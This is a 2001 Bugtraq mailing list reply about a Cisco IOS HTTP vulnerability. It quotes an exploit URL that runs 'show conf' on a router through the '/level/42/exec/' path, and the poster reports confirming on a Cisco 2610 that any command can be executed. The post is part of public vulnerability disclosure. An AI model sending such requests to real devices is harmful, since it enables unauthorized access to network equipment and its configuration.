From krawiec@saturn.expro.pl Mon Jul 16 03:23:56 2001
From: Grzegorz Krawczyk <krawiec@saturn.expro.pl>
To: bugtraq@securityfocus.com
Date: Tue, 3 Jul 2001 09:14:06 +0200 (CEST)
Subject: Re: Cisco device HTTP exploit...

> A malicious user could use:
> 
> http://169.254.0.15/level/42/exec/show%20conf
I've tested it on CISCO 2610 router with
IOS (tm) C2600 Software (C2600-I-M), Version 12.0(10), RELEASE SOFTWARE
(fc1)
It work.. You can exec any command..

Krawiec